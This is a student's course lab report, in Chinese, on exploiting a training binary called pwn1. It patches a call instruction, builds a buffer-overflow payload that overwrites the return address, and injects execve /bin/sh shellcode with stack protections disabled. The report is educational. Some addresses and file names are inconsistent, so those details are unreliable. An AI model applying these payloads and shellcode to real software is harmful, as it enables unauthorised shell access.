20251907 2025-2026-2《网络攻防实践》 第九周作业
1.实践内容
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
三个实践内容如下:
手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。
实验要求:
掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
掌握反汇编与十六进制编程器
能正确修改机器指令改变程序执行流程
能正确构造payload进行bof攻击
2.实践过程
2.1 手工修改可执行文件
输入命令hostnamectl set-hostname queke修改kali虚拟机主机名为自己姓名
重启系统后可以查看到已经修改成功
将pwn1拷贝至虚拟机中,输入命令mv pwn1 pwn20251907修改文件名为学号
输入命令对可执行文件进行反汇编:
找到getshell、foo、main函数,在main函数中可以看到80484b5: e8 d7 ff ff ff call 8048491 <foo>
80484b5:
这是当前这条指令在内存中的地址(就是这条指令存放在哪里)。
e8 d7 ff ff ff:这是机器码(CPU 真正能看懂的二进制 / 十六进制指令)。
e8 = call 指令的操作码
后面 4 个字节是跳转偏移量
call 8048491 :这是反汇编后的人类可读格式,意思是:现在执行到这里,立刻跳去执行名为 foo 的函数,执行完再跳回来。
从图中可以查看到getShell函数的地址为0804847d。
若要达到调用getshell函数的目的就要修改e8 d7 ff ff ff,加上80484ba变为getshell函数的地址,所以要修改为e8 c3 ff ff ff。
输入命令vim pwn20251907打开可执行文件,退出后输入指令:%!xxd查看16进制的格式。
输入命令/e8 d7查找到需要修改的位置
将e8 d7 ff ff ff修改为e8 c3 ff ff ff,输入命令:%!xxd -r转换为原格式,然后输入:wq保存。
再次输入命令objdump -d pwn20251907 | more进行反汇编,得到:
可见修改成功。
运行pwn20251907程序:
成功进入shell。
2.2 利用foo函数的Bof漏洞,构造一个攻击输入字符串
还原原文件,对其进行反汇编,对foo函数进行分析:
这两行sub $0x38,%esp #给堆栈esp预留了一定大小的空间和lea -0x1c(%ebp),%eax #将携带偏移量0x1c的ebp放到eax较为关键。
缓冲区起始地址:ebp - 0x1c返回地址:ebp + 4,偏移量:(ebp + 4) - (ebp - 0x1c) = 0x20 = 32字节
所以需要在第32字节之后(第33~36字节) 填入 getShell()的地址:0804847d。
下载并安装gdb:
可以找到getshell的地址。
构造攻击输入字符串:
11112222333344445555666677778888\x7d\x84\x04\x08
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > 20251907_input xxd 20251907_input
输入命令进行测试:
(cat 20251907_input; cat) | ./pwn20251907
将20251907_input中的内容通过管道传输给pwn20251907作为输入。
攻击成功!
2.3 注入一个自己制作的shellcode并运行这段shellcode
安装execstack:
wget http://mirrors.aliyun.com/ubuntu/pool/universe/p/prelink/execstack_0.0.20131005-1.1_amd64.deb
sudo dpkg -i execstack_0.0.20131005-1.1_amd64.deb
execstack -s pwn20251907 #设置堆栈为可执行状态 execstack -q pwn20251907 #堆栈是否为可执行状态
输入命令more /proc/sys/kernel/randomize_va_space查看地址状态随机化
关闭地址随机化:
通过perl来构造输入字符串:
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input3_20251907
打开两个终端,一个终端输入命令(cat input3_20251907;cat) | ./pwn20251907作为pwn20251907的输入,另一个终端输入命令ps -ef | grep pwn20251907查看进程。
可得进程号为22198。
再打开一个终端,进行gdb调试:
依次输入命令:
gdb pwn20251907
attach 22198
disassemble foo #查看foo函数的ret指令的地址
break *0x080484ae #设置断点
在一个终端按回车,另一个gdb终端输入c,输入命令info r esp查看到栈顶指针所在位置为0xffffcf6c
输入命令x/16x 0xffffcf6c查看当前栈顶的值。
计算地址:0xffffcf6c+4=0xffffcf71,所以构造shellcode:
perl -e 'print "A" x 32;print "\x70\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a"' > input3_20251907
输入命令
(cat input7_20251907;cat) | ./pwn20251907
攻击成功。
3. 学习中遇到的问题及解决
1.无法下载gdb组件
调整源,将国外资源调整到国内资源渠道
2.attach 22198出现问题
重新更新,再attach 22198寻找问题
4. 实践总结
通过学习缓冲区溢出、堆栈原理、汇编语言、机器指令以及shellcode等知识,我理解了程序内存布局与调用逻辑,明白溢出漏洞成因是程序未校验输入长度,导致数据越界覆盖栈内关键地址。掌握了反汇编分析指令、修改内存字节构造恶意代码、编写shellcode执行恶意指令的原理。认识到底层代码安全隐患,懂得从内存、指令层面排查漏洞,建立起底层安全思维,理解恶意攻击原理,提升代码安全防护和漏洞防范意识。